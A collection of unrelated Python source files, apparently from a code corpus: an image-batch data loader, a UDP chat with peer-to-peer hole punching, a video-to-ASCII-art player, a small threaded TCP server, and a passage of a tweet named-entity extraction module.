if self.suffle: random.shuffle(self.FileList)
self.itr = 0
self.Epoch += 1
#====================Start reading data multithreaded===========================================================
self.thread_list = []
for pos in range(BatchSize):
th=threading.Thread(target=self.LoadNext,name="thread"+str(pos),args=(pos,self.itr+pos,Hb,Wb))
self.thread_list.append(th)
th.start()
self.itr+=BatchSize
###########################################################################################################
#Wait until the data batch loading started at StartLoadBatch is finished
def WaitLoadBatch(self):
for th in self.thread_list:
th.join()
########################################################################################################################################################################################
def LoadBatch(self):
# Load batch for training (muti threaded run in parallel with the training proccess)
# For training
self.WaitLoadBatch()
Imgs=self.BImgs
SegmentMask=self.BSegmentMask
ROIMask=self.BROIMask
PointerMap=self.BPointerMap
self.StartLoadBatch()
return Imgs, SegmentMask,ROIMask,PointerMap
########################################################################################################################################################################################
def LoadSingleClean(self):
# Load batch of on image segment and pointer point without croping or resizing
# for evaluation step
if self.itr >= len(self.FileList):
self.itr = 0
self.Epoch += 1
Hb, Wb, d = cv2.imread(self.AnnotationDir + "/" + self.FileList[self.itr]).shape
self.BImgs = np.zeros((1, Hb, Wb, 3)) #
self.BSegmentMask = np.zeros((1, Hb, Wb))
self.BROIMask = np.zeros((1, Hb, Wb)) #
self.BPointerMap = np.zeros((1, Hb, Wb))
self.BIsThing = np.zeros((1))
self.BCat = np.zeros((1))
self.LoadNext(0,self.itr, Hb,Wb)
self.itr += 1
Imgs = self.BImgs
SegmentMask = self.BSegmentMask
ROIMask = self.BROIMask
PointerMap = self.BPointerMap
IsThing = self.BIsThing[0]
return Imgs, SegmentMask, ROIMask, PointerMap,IsThing
|
udpchat.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 25 19:34:11 2019
@author: mrich
"""
import argparse
import socket
import threading
import queue
import sys
import random
import os
import re
import random
import string
import time
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def randomString(stringLength=10):
"""Generate a random string of fixed length """
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def checkForCommand(data):
# returns false on no command, or the command string on command
cmd_regex = r"]->!(.+)"
match = re.search(cmd_regex,data)
if match:
return match.group(1)
return False
"""
My peering strat
!trypeer - sent by a client to ask for peering
!gopeer|ip,port,nonce - Sent by server back to clients with ip and port they should start sending to
!peer|nonce - Sent by client to client until the corresponding peer is received, indicating link is up
"""
#Client Code
def ReceiveData(sock):
data = False
try:
data,addr = sock.recvfrom(1024)
data=data.decode('utf-8')
return data,addr
except:
return False,0
"""
client states:
0 = client - server
1 = waiting for peer
2 = in peer
"""
def monitorUserInput(q):
while True:
data = input()
q.put((data))
if data == 'qqq':
break
return
def RunClient():
clientState = 0
host = get_ip()
port = random.randint(6000,10000)
print('Client IP->'+str(host)+' Port->'+str(port))
server = (str(args.ip),args.port)
# peer place holder
peerIP = '127.0.0.1'
peerPort = 31337
nonce ='notset'
peer = (peerIP,peerPort)
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.setblocking(False)
s.bind((host,port))
name = args.handle
while name is None:
name = input('Please write your name here: ')
s.sendto(name.encode('utf-8'),server)
userInput = queue.Queue()
threading.Thread(target=monitorUserInput,args=(userInput,)).start()
print("'qqq' to exit")
while keepRunning:
#print('loop')
if not userInput.empty():
data = userInput.get()
#print("User input received {}".format(data))
if data == 'qqq':
break
elif data=='':
continue
data = '['+name+']' + '->'+ data
if clientState in [0,1]:
s.sendto(data.encode('utf-8'),server)
elif clientState == 2:
s.sendto(data.encode('utf-8'),peer)
data,addr = ReceiveData(s)
if data:
cmd = checkForCommand(data)
if cmd:
if clientState == 0:
# check for gopeer command
if (cmd.startswith("gopeer")):
# get the important part
peerIP, peerPort, nonce = cmd.split("|")[1].split(",")
# set te peer
peer = (peerIP, int(peerPort))
#set the state
clientState = 1
print("Go peer recvd: {}, {}, {}".format(peerIP, peerPort, nonce))
if clientState == 1:
if (cmd.startswith("peer")):
# get the sent nonce
print("peer recvd: {}".format(cmd))
sentnonce = cmd.split("|")[1]
if (nonce == sentnonce):
# We are peered!
print("[!] Peer to peer established!")
clientState = 2
else:
print("nonce mismatch? {} != {}".format(nonce, sentnonce))
if clientState == 2:
# placeholder
pass
#print("Command received: {}".format(cmd))
# end command check
else:
# just print the received message
print("[{}]: {}".format(addr,data))
else:
# No data was received, placeholder
pass
# Need to send the peer command if in correct state
if clientState == 1:
peercmd = '['+name+']->!peer|' + nonce
s.sendto(peercmd.encode('utf-8'),peer)
# little sleep to prevent crazy message spam
time.sleep(0.1)
s.close()
os._exit(1)
#Client Code Ends Here
#Server Code
def RecvData(sock,recvPackets):
while keepRunning:
data,addr = sock.recvfrom(1024)
recvPackets.put((data,addr))
def RunServer():
host = get_ip()
port = args.port
print('Server hosting on IP-> '+str(host))
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.bind((host,port))
clients = set()
recvPackets = queue.Queue()
print('Server Running...')
threading.Thread(target=RecvData,args=(s,recvPackets)).start()
while keepRunning:
while not recvPackets.empty():
data,addr = recvPackets.get()
if addr not in clients:
clients.add(addr)
#continue
#clients.add(addr)
data = data.decode('utf-8')
cmd = checkForCommand(data)
if cmd:
print("Command received: {}".format(cmd))
if cmd.startswith('trypeer'):
# go through the list of clients and send a gopeer message
# this is really only meant for single peer to peer testing
nonce = randomString(5)
for c1 in clients:
for c2 in clients:
if c1 != c2:
# format data in c2 and send as gopeer
msg = "[server]->!gopeer|{},{},{}".format(c2[0], c2[1], nonce)
print("sending {} to {}".format(msg,str(c1)))
s.sendto(msg.encode('utf-8'),c1)
# end if c1 != c2
# end for c2
# end for c1
# end command check
elif data.endswith('qqq'):
clients.remove(addr)
continue
else:
print(str(addr)+data)
for c in clients:
if c!=addr:
s.sendto(data.encode('utf-8'),c)
s.close()
#Server Code Ends Here
description = 'UDP Chat v0.1 Beta\n'
description += "Want to learn about UDP hole punching? Write it yourself.\n"
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("mode", type=str, help="Either server or client", choices=['server', 'client'])
parser.add_argument("--ip", type=str, help="Server IP, required in client mode")
parser.add_argument("--port", type=int, help="Server port. If specified in server mode, will establish server at given port", default=5000)
parser.add_argument("--handle", type=str, help="Your chosen chat handle. If not specified, will be requested")
# And GO!
args = parser.parse_args()
keepRunning = True
if (args.mode == 'client') and (args.ip is None):
parser.error("client mode requires the server ip, set with '--ip=x.x.x.x'")
if __name__ == '__main__':
try:
if args.mode=='server':
#print("would run server at port {}".format(args.port))
RunServer()
elif args.mode=='client':
#print("Would run client to server at {}:{} with handle: {}".format(args.ip, args.port, args.handle))
RunClient()
except Exception as badnews:
# basically exiting all threads on an exception
print("Exiting because of {}".format(badnews))
keepRunning = False
print("Stopped.")
os._exit(1)
|
video2chars.py
|
# -*- coding:utf-8 -*-
import numpy as np
import pickle
import os
import invoke
from threading import Thread
# 用于生成字符画的像素,越往后视觉上越明显。。这是我自己按感觉排的,你可以随意调整。写函数里效率太低,所以只好放全局了
# pixels = " .,-'`:!1+*abcdefghijklmnopqrstuvwxyz<>()\/{}[]?234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ%&@#$"
# pixels = "$@B%8&WM#wmhkbdpqaozcvunxrt*+1!;:`'-,. "
# pixels = "@$&B8ao*?+=~-,. "
pixels = "$@%WMB#QOwmri*^+-;:'`,. "
def video2imgs(video_name, size, seconds):
"""
:param video_name: 字符串, 视频文件的路径
:param size: 二元组,(宽, 高),用于指定生成的字符画的尺寸
:param seconds: 指定需要解码的时长(0-seconds)
:return: 一个 img 对象的列表,img对象实际上就是 numpy.ndarray 数组
"""
import cv2 # 导入 opencv
img_list = []
# 从指定文件创建一个VideoCapture对象
cap = cv2.VideoCapture(video_name)
# 帧率
fps = cap.get(cv2.CAP_PROP_FPS)
# 需要提取的帧数
frames_count = fps * seconds
count = 0
# cap.isOpened(): 如果cap对象已经初始化完成了,就返回true
while cap.isOpened() and count < frames_count:
# cap.read() 返回值介绍:
# ret 表示是否读取到图像
# frame 为图像矩阵,类型为 numpy.ndarry.
ret, frame = cap.read()
if ret:
# 转换成灰度图,也可不做这一步,转换成彩色字符视频。
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# resize 图片,保证图片转换成字符画后,能完整地在命令行中显示。
img = cv2.resize(gray, size, interpolation=cv2.INTER_AREA)
# 分帧保存转换结果
img_list.append(img)
count += 1
else:
break
# 结束时要释放空间
cap.release()
return img_list, fps
def img2chars(img):
res = []
"""
:param img: numpy.ndarray, 图像矩阵
:return: 字符串的列表:图像对应的字符画,其每一行对应图像的一行像素
"""
# 要注意这里的顺序和 之前的 size 刚好相反
height, width = img.shape
for row in range(height):
imgline = []
line = ""
for col in range(width):
# 灰度是用8位表示的,最大值为255。
# 这里将灰度转换到0-1之间
percent = img[row][col] / 255
imgline.append(img[row][col])
# 将灰度值进一步转换到 0 到 (len(pixels) - 1) 之间,这样就和 pixels 里的字符对应对应起来了
index = int(percent * (len(pixels)-1))
# if 200 <=img[row][col] <= 210:
# index = 13
# 添加字符像素(最后面加一个空格,是因为命令行有行距却没几乎有字符间距,用空格当间距)
line += pixels[index] + " "
res.append(line)
# print(imgline)
# print("*"*100)
return res
def imgs2chars(imgs):
video_chars = []
for img in imgs:
video_chars.append(img2chars(img))
return video_chars
def play_video(video_chars, frames_rate):
"""
播放字符视频,curses版
:param video_chars: 字符画的列表,每个元素为一帧
:param frames_rate: 帧率
:return: None
"""
# 导入需要的模块,这两个模块只有这个函数需要,所以在这里导入了
import time
import curses
# 获取字符画的尺寸
width, height = len(video_chars[0][0]), len(video_chars[0])
# 初始化curses,这个是必须的,直接抄就行
stdscr = curses.initscr()
curses.start_color()
try:
# 调整窗口大小,宽度最好略大于字符画宽度。另外注意curses的height和width的顺序
stdscr.resize(height, width * 2)
for pic_i in range(len(video_chars)):
# 显示 pic_i,即第i帧字符画
for line_i in range(height):
# 将pic_i的第i行写入第i列。(line_i, 0)表示从第i行的开头开始写入。最后一个参数设置字符为白色
stdscr.addstr(line_i, 0, video_chars[pic_i][line_i], curses.COLOR_WHITE)
stdscr.refresh() # 写入后需要refresh才会立即更新界面
time.sleep(1 / frames_rate) # 粗略地控制播放速度。
finally:
# curses 使用前要初始化,用完后无论有没有异常,都要关闭
curses.endwin()
return
# def play_video(video_chars, frames_rate):
# """
# 播放字符视频,clear版
# :param video_chars: 字符画的列表,每个元素为一帧
# :param frames_rate: 帧率
# :return: None
# """
# # 导入需要的模块,这两个模块只有这个函数需要,所以在这里导入了
# import time
# import subprocess
# # 获取字符画的尺寸
# width, height = len(video_chars[0][0]), len(video_chars[0])
# for pic_i in range(len(video_chars)):
# # 显示 pic_i,即第i帧字符画
# for line_i in range(height):
# # 将pic_i的第i行写入第i列。(line_i, 0)表示从第i行的开头开始写入。最后一个参数设置字符为白色
# print(video_chars[pic_i][line_i])
# time.sleep(1 / frames_rate) # 粗略地控制播放速度。
# subprocess.call("clear")
def dump(obj, file_name):
"""
将指定对象,以file_nam为名,保存到本地
"""
with open(file_name, 'wb') as f:
pickle.dump(obj, f)
return
def load(filename):
"""
从当前文件夹的指定文件中load对象
"""
with open(filename, 'rb') as f:
return pickle.load(f)
def get_file_name(file_path):
"""
从文件路径中提取出不带拓展名的文件名
"""
# 从文件路径获取文件名 _name
path, file_name_with_extension = os.path.split(file_path)
# 拿到文件名前缀
file_name, file_extension = os.path.splitext(file_name_with_extension)
return file_name
def has_file(path, file_name):
"""
判断指定目录下,是否存在某文件
"""
return file_name in os.listdir(path)
def get_video_chars(video_path, size, seconds):
"""
返回视频对应的字符视频
"""
video_dump = "output/" + get_file_name(video_path) + ".pickle"
# 如果 video_dump 已经存在于当前文件夹,就可以直接读取进来了
if has_file("./output/", video_dump):
print("发现该视频的转换缓存,直接读取")
video_chars, fps = load(video_dump)
else:
print("未发现缓存,开始字符视频转换")
print("开始逐帧读取")
# 视频转字符动画
imgs, fps = video2imgs(video_path, size, seconds)
print("视频已全部转换到图像, 开始逐帧转换为字符画")
video_chars = imgs2chars(imgs)
print("转换完成,开始缓存结果")
# 把[video_chars, fps]保存下来
dump([video_chars, fps], video_dump)
print("缓存完毕")
return video_chars, fps
def play_audio(video_path):
def call():
# 使用 invoke 库调用本地方法
# 之所以不用 subprocess,是因为它没有 hide 属性,调用 mpv 时,即使将输出流重定向了,还是会影响字符画的播放。
invoke.run(f"mpv --no-video {video_path}", hide=True, warn=True)
# 这里创建子线程来执行音乐播放指令,因为 invoke.run() 是一个阻塞的方法,要同时播放字符画和音乐的话,就要用多线程/进程。
p = Thread(target=call)
p.setDaemon(True)
p.start()
def main():
# 宽,高
size = (54, 96)
# 视频路径,换成你自己的
video_path = "video-1.mp4"
seconds = 15 # 只转换三十秒
video_chars, fps = get_video_chars(video_path, size, seconds)
# 播放音轨
play_audio(video_path)
# 播放视频
play_video(video_chars, fps)
if __name__ == "__main__":
main()
|
socket_server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @File : socket_server.py
# @Time : 2019/2/28 23:19
# @Author : MaiXiaochai
# @Site : https://github.com/MaiXiaochai
import socket
import threading
# socket.AF_INET IPV4
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 参数为数组
server.bind(('0.0.0.0', 8000))
server.listen()
def handle_sock(sock, addr):
# 一次获取1K的数据
data = sock.recv(1024)
print(data.decode('utf8'))
re_data = input()
# byte -> decode -> str -> encode -> byte
sock.send(re_data.encode('utf8'))
# 这里的server端只能接收一个请求,因为后边是while循环
# 那么如何才能实现多用户连接?
# 多线程。
while True:
# 获取从客户端发送的数据
sock, addr = server.accept()
client_thread = threading.Thread(target=handle_sock, args=(sock, addr))
client_thread.start()
|
SatadishaModule_final_trie.py
|
# coding: utf-8
# In[298]:
import sys
import re
import string
import csv
import random
import time
#import binascii
#import shlex
import numpy as np
import pandas as pd
from itertools import groupby
from operator import itemgetter
from collections import Iterable, OrderedDict
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from scipy import stats
#from datasketch import MinHash, MinHashLSH
import NE_candidate_module as ne
import NE_candidate_module as ne
import Mention
import threading, queue
import time
import datetime
import copy
import trie as trie
# In[324]:
#---------------------Existing Lists--------------------
cachedStopWords = stopwords.words("english")
tempList=["i","and","or","other","another","across","were","you","then","still","is","while","till","nor","perhaps","otherwise","until","sometimes","sometime","seem","cannot","seems","because","can","like","into","able","unable","either","neither","if","we","it","else","elsewhere","how","not","what","who","when","where","where's","where’s","where'd","where’d","where'll","where’ll","who's","who’s","he's","he’s","he’d","he'd","she's","she’s","she’d","she'd","let","today","tomorrow","tonight","let's","let’s","lets","know","make","oh","via","i","yet","must","mustnt","mustn't","mustn’t","i'll","i’ll","you'll","you’ll","we'll","we’ll","done","doesnt","doesn't","doesn’t","dont","don't","don’t","did","didnt","didn't","didn’t","much","without","could","couldn't","couldn’t","would","wouldn't","wouldn’t","should","shouldn't","shouldn’t","shall","isn't","isn’t","hasn't","hasn’t","was","wasn't","wasn’t","also","let's","let’s","let","well","just","everyone","anyone","noone","none","someone","theres","there's","there’s","everybody","nobody","somebody","anything","else","elsewhere","something","nothing","everything","i'd","i’d","i’m","won't","won’t","i’ve","i've","they're","they’re","we’re","we're","we'll","we’ll","we’ve","we've","they’ve","they've","they’d","they'd","they’ll","they'll","again","you're","you’re","you've","you’ve","thats","that's",'that’s','here’s',"here's","what's","what’s","i’m","i'm","a","so","except","arn't","aren't","arent","this","when","it","it’s","it's","he's","she's","she'd","he'd","he'll","she'll","she’ll","many","can't","cant","can’t","werent","weren't","were’t","even","yes","no","these","here","there","to","maybe","<hashtag>","<hashtag>.","ever","every","never","there's","there’s","whenever","wherever","however","whatever","always"]
prep_list=["in","at","of","on","with","by","&;"] #includes common conjunction as well
article_list=["a","an","the"]
day_list=["sunday","monday","tuesday","wednesday","thursday","friday","saturday","mon","tues","wed","thurs","fri","sat","sun"]
month_list=["january","february","march","april","may","june","july","august","september","october","november","december","jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec"]
for item in tempList:
if item not in cachedStopWords:
cachedStopWords.append(item)
cachedStopWords.remove("don")
#cachedStopWords.remove("may")
cachedTitles = ["mr.","mr","mrs.","mrs","miss","ms","sen.","dr","dr.","prof.","president","congressman"]
chat_word_list=["please","4get","ooh","idk","oops","yup","stfu","uhh","2b","dear","yay","btw","ahhh","b4","ugh","ty","cuz","coz","sorry","yea","asap","ur","bs","rt","lfmao","slfmao","u","r","nah","umm","ummm","thank","thanks","congrats","whoa","rofl","ha","ok","okay","hey","hi","huh","ya","yep","yeah","fyi","duh","damn","lol","omg","congratulations","fuck","wtf","wth","aka","wtaf","xoxo","rofl","imo","wow","fck","haha","hehe","hoho"]
#string.punctuation.extend('“','’','”')
#---------------------Existing Lists--------------------
# In[300]:
class SatadishaModule():
def __init__(self):
print("hello")
#self.batch=batch
#self.batch=self.batch[:3000:]
self.counter=0
#self.extract()
def flatten(self,mylist, outlist,ignore_types=(str, bytes, int, ne.NE_candidate)):
if mylist !=[]:
for item in mylist:
#print not isinstance(item, ne.NE_candidate)
if isinstance(item, list) and not isinstance(item, ignore_types):
self.flatten(item, outlist)
else:
if isinstance(item,ne.NE_candidate):
item.phraseText=item.phraseText.strip(' \t\n\r')
item.reset_length()
else:
if type(item)!= int:
item=item.strip(' \t\n\r')
outlist.append(item)
return outlist
def normalize(self,word):
strip_op=word
strip_op=(((strip_op.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()).lower()
strip_op=(strip_op.lstrip('“‘’”')).rstrip('“‘’”')
#strip_op= self.rreplace(self.rreplace(self.rreplace(strip_op,"'s","",1),"’s","",1),"’s","",1)
if strip_op.endswith("'s"):
li = strip_op.rsplit("'s", 1)
return ''.join(li)
elif strip_op.endswith("’s"):
li = strip_op.rsplit("’s", 1)
return ''.join(li)
else:
return strip_op
#@profile
def extract(self,batch,batch_number):
#df = read_csv('eric_trump.csv', index_col='ID', header=0, encoding='utf-8')
print("Phase I extracting now")
time_in=time.time()
self.batch=batch
#output.csv
#df_out= DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'usertype', 'TweetSentence', 'phase1Candidates'))
self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','start_time','entry_batch','annotation'))
if(self.counter==0):
#self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','correct_candidates_tweet'))
#dict1 = {'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}
self.CTrie=trie.Trie("ROOT")
self.ME_EXTR=Mention.Mention_Extraction()
self.phase2stopWordList=[]
#self.df_out= pd.DataFrame({'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}, index=[0,])
#%%timeit -o
#module_capital_punct.main:
'''I am running this for 100 iterations for testing purposes. Of course you no longer need this for loop as you are
#running one tuple at a time'''
#if(self.counter==0):
#initializing candidateBase with a dummy node
#self.interCWSGap={}
#candidateBase={}
#NE_container=DataFrame(columns=('candidate', 'frequency', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'))
count=0
ne_count=0
userMention_count=0
#token_count=0
NE_list_phase1=[]
UserMention_list=[]
df_holder=[]
#--------------------------------------PHASE I---------------------------------------------------
for index, row in self.batch.iterrows():
now = datetime.datetime.now()
#now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
#hashtags=str(row['Discussion'])
hashtags=str(row['HashTags'])
user=str(row['User'])
#userType=str(row['User Type'])
tweetText=str(row['TweetText'])
#correct_candidates_tweet=str(row['Mentions'])
#print(str(index))
annot_raw=str(row['mentions_other'])
split_list=annot_raw.split(";")
#split_listFilter=list(filter(lambda element: element.strip()!='', split_list))
split_listFilter=list(filter(None, split_list))
#annotations in list of list structure
filtered_2_times=list(map(lambda element: list(filter(None, element.split(','))), split_list))
#capitalization module
#if all words are capitalized:
# print(index)
# if tweetText.isupper():
# print(index,tweetText)
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
# elif tweetText.islower():
# print(index,tweetText)
# print("",end="")
# dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
# df_holder.append(dict1)
#else:
ne_List_final=[]
userMention_List_final=[]
#pre-modification: returns word list split at whitespaces; retains punctuation
tweetSentences=list(filter (lambda sentence: len(sentence)>1, tweetText.split('\n')))
tweetSentenceList_inter=self.flatten(list(map(lambda sentText: sent_tokenize(sentText.lstrip().rstrip()),tweetSentences)),[])
tweetSentenceList=list(filter (lambda sentence: len(sentence)>1, tweetSentenceList_inter))
#filtering nan values
if(len(filtered_2_times[0])==1):
if(filtered_2_times[0][0]=='nan'):
filtered_2_times[0]=[]
# print(index,filtered_2_times,tweetSentenceList)
for sen_index in range(len(tweetSentenceList)):
sentence=tweetSentenceList[sen_index]
modified_annotations=[self.normalize(candidate)for candidate in filtered_2_times[sen_index]]
annotation=[]
for candidate in modified_annotations:
if(candidate=="nan"):
pass
else:
annotation.append(candidate)
# for i in filtered_2_times[sen_index]:
# if(i=="nan"):
#print(sentence)
#print(sen_index)
#tweetWordList= list(filter(lambda word:(word.strip(string.punctuation))!="",sentence.split()))
phase1Out=""
if((not tweetText.isupper()) &(not tweetText.islower())):
tempList=[]
tempWordList=sentence.split()
#print(tempWordList)
for word in tempWordList:
temp=[]
# if(temp1):
# temp=list(map(lambda elem: elem+'..', temp1[:-1]))
# temp.append(temp1[-1])
if (("?" in word)&(not word.endswith("?"))):
temp1=list(filter(lambda elem: elem!='',word.split("?")))
if(temp1):
temp=list(map(lambda elem: elem+'?', temp1[:-1]))
temp.append(temp1[-1])
elif ((":" in word)&(not word.endswith(":"))):
temp1=list(filter(lambda elem: elem!='',word.split(":")))
if(temp1):
temp=list(map(lambda elem: elem+':', temp1[:-1]))
temp.append(temp1[-1])
elif (("," in word)&(not word.endswith(","))):
#temp=list(filter(lambda elem: elem!='',word.split(",")))
temp1=list(filter(lambda elem: elem!='',word.split(",")))
if(temp1):
temp=list(map(lambda elem: elem+',', temp1[:-1]))
temp.append(temp1[-1])
elif (("/" in word)&(not word.endswith("/"))):
temp1=list(filter(lambda elem: elem!='',word.split("/")))
if(temp1):
temp=list(map(lambda elem: elem+'/', temp1[:-1]))
temp.append(temp1[-1])
elif "..." in word:
#print("here")
temp=list(filter(lambda elem: elem!='',word.split("...")))
# if(temp1):
# temp=list(map(lambda elem: elem+'...', temp1[:-1]))
# temp.append(temp1[-1])
elif ".." in word:
temp=list(filter(lambda elem: elem!='',word.split("..")))
#print(index, temp)
else:
#if word not in string.punctuation:
temp=[word]
if(temp):
tempList.append(temp)
tweetWordList=self.flatten(tempList,[])
#print(tweetWordList)
#token_count+=len(tweetWordList)
#returns position of words that are capitalized
#print(tweetWordList)
tweetWordList_cappos = list(map(lambda element : element[0], filter(lambda element : self.capCheck(element[1]), enumerate(tweetWordList))))
#print(tweetWordList_cappos)
#returns list of stopwords in tweet sentence
combined_list_here=([]+cachedStopWords+article_list+prep_list+chat_word_list)
#combined_list_here.remove("the")
tweetWordList_stopWords=list(filter(lambda word: ((word[0].islower()) & (((word.strip()).strip(string.punctuation)).lower() in combined_list_here))|(word.strip() in string.punctuation)|(word.startswith('@')), tweetWordList))
#returns list of @userMentions
userMentionswPunct=list(filter(lambda phrase: phrase.startswith('@'), tweetWordList))
userMentions=list(map(lambda mention: mention.rstrip(string.punctuation), userMentionswPunct))
userMention_count+=len(userMentions)
userMention_List_final+=userMentions
'''#function to process and store @ user mentions---- thread 1
#print(userMention_List_final)
threading.Thread(target=self.ME_EXTR.ComputeAll, args=(userMention_List_final,)).start()'''
#non @usermentions are processed in this function to find non @, non hashtag Entities---- thread 2
ne_List_allCheck=[]
#if(len(tweetWordList)>len(tweetWordList_cappos)):
#print(len(tweetWordList),str(len(tweetWordList_cappos)),str(len(tweetWordList_stopWords)))
if((len(tweetWordList))>(len(tweetWordList_cappos))):
#q = queue.Queue()
#threading.Thread(target=self.trueEntity_process, args=(tweetWordList_cappos,tweetWordList,q)).start()
ne_List_allCheck= self.trueEntity_process(tweetWordList_cappos,tweetWordList)
#ne_List_allCheck= q.get()
ne_count+=len(ne_List_allCheck)
ne_List_final+=ne_List_allCheck
#write row to output dataframe
if(len(tweetWordList)==len(tweetWordList_cappos)):
phase1Out="nan"
if(len(ne_List_allCheck)>0):
for candidate in ne_List_allCheck:
position = '*'+'*'.join(str(v) for v in candidate.position)
position=position+'*'
candidate.set_sen_index(sen_index)
phase1Out+=(((candidate.phraseText).lstrip(string.punctuation)).strip())+ '::'+str(position)+"||"
else:
phase1Out="nan"
#print(self.df_out.columns)
dict1 = {'tweetID':str(index), 'sentID':str(sen_index), 'hashtags':hashtags, 'user':user, 'TweetSentence':sentence, 'phase1Candidates':phase1Out,'start_time':now,'entry_batch':batch_number,'annotation':annotation}
df_holder.append(dict1)
#self.df_out.append(outrow)
#self.df_out=self.df_out.append(outrow,ignore_index=True)
for candidate in ne_List_final:
#self.insert_dict (candidate,self.NE_container,candidateBase,index,candidate.sen_index,batch_number)
candidateText=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
candidateText=(candidateText.lstrip('“‘’”')).rstrip('“‘’”')
candidateText= self.rreplace(self.rreplace(self.rreplace(candidateText,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
if not ((candidateText in combined)|(candidateText.isdigit())|(self.is_float(candidateText))):
self.CTrie.__setitem__(candidateText.split(),len(candidateText.split()),candidate.features,batch_number)
if(index==191):
print(sentence)
self.printList(ne_List_final)
#if(userMention_List_final):
# print(userMention_List_final)
NE_list_phase1+=ne_List_final
UserMention_list+=userMention_List_final
#print ("\n")
#fieldnames=['candidate','freq','length','cap','start_of_sen','abbrv','all_cap','is_csl','title','has_no','date','is_apostrp','has_inter_punct','ends_verb','ends_adverb','change_in_cap','topic_ind','entry_time','entry_batch','@mention']
#updated_NE_container=[]
'''#Updating trie with @mention info
self.CTrie.updateTrie("",self.ME_EXTR)'''
time_out=time.time()
#for display purposes Iterating through the trie
'''candidateBase= self.CTrie.__iter__()
for node in candidateBase:
print(node)'''
'''for key in self.NE_container.keys():
val=self.NE_container[key]+[str(ME_EXTR.checkInDictionary(key))]
#index+=1
#updated_NE_container[key]=val
dict1 = {'candidate':key, 'freq':val[0],'length':val[1],'cap':val[2],'start_of_sen':val[3],'abbrv':val[4],'all_cap':val[5],'is_csl':val[6],'title':val[7],'has_no':val[8],'date':val[9],'is_apostrp':val[10],'has_inter_punct':val[11],'ends_verb':val[12],'ends_adverb':val[13],'change_in_cap':val[14],'topic_ind':val[15],'entry_time':val[16],'entry_batch':val[17],'@mention':val[18]}
updated_NE_container.append(dict1)'''
'''with open('candidate_base.csv', 'w') as output_candidate:
#with open('candidates.csv', 'w') as output_candidate:
writer = csv.writer(output_candidate)
writer.writerow(fieldnames)
for k, v in updated_NE_container.items():
writer.writerow([k] + v)'''
#print("Total number of tokens processed: "+str(token_count))
#print ("Total number of candidate NEs extracted: "+str(len(candidateBase)))
#print(self.NE_container.items())
#freqs=pd.read_csv('candidate_base.csv', encoding = 'utf-8',delimiter=',')
#freqs = pd.DataFrame(updated_NE_container, columns=fieldnames)
#freqs = pd.DataFrame()
#freqs=pd.DataFrame(list(self.NE_container.items()), orient='index')#columns=fieldnames)
self.append_rows(df_holder)
self.counter=self.counter+1
#return (copy.deepcopy(self.df_out),copy.deepcopy(freqs),time_in,time_out)
return (self.df_out,self.CTrie,time_in,time_out,self.phase2stopWordList)
#return sorted_candidateBase
#@profile
def append_rows(self,df_holder):
df = pd.DataFrame(df_holder)
self.df_out=self.df_out.append(df)
self.df_out.to_csv('tweet_base.csv' ,sep=',', encoding='utf-8')
def rreplace(self,s, old, new, occurrence):
if s.endswith(old):
li = s.rsplit(old, occurrence)
return new.join(li)
else:
return s
def stopwordReplace(self, candidate):
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
if(candidate.features[ne.is_quoted]):
words=self.normalize(candidate.phraseText).split()
flag=False
swList=[]
for word in words:
if(word in combined):
swList.append(word)
else:
flag=True
#print(candidate.phraseText,swList,flag)
if(flag):
self.phase2stopWordList=list(set(self.phase2stopWordList)|set(swList))
#self.phase2stopWordList.extend(swList)
else:
candidate.phraseText=""
return candidate
wordlist=list(filter(lambda word: word!='', candidate.phraseText.split()))
pos=candidate.position
#print(candidate.phraseText,wordlist,pos)
start=0
flag=False
while(start!=len(pos)):
if(wordlist[start].lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined):
#flag=True
break
start+=1
end=len(pos)-1
while(end>=0):
#print(wordlist[end])
if(wordlist[end].lstrip(string.punctuation).rstrip(string.punctuation).strip() not in combined):
#flag=True
break
end-=1
#print(start,end)
updated_pos=pos[start:(end+1)]
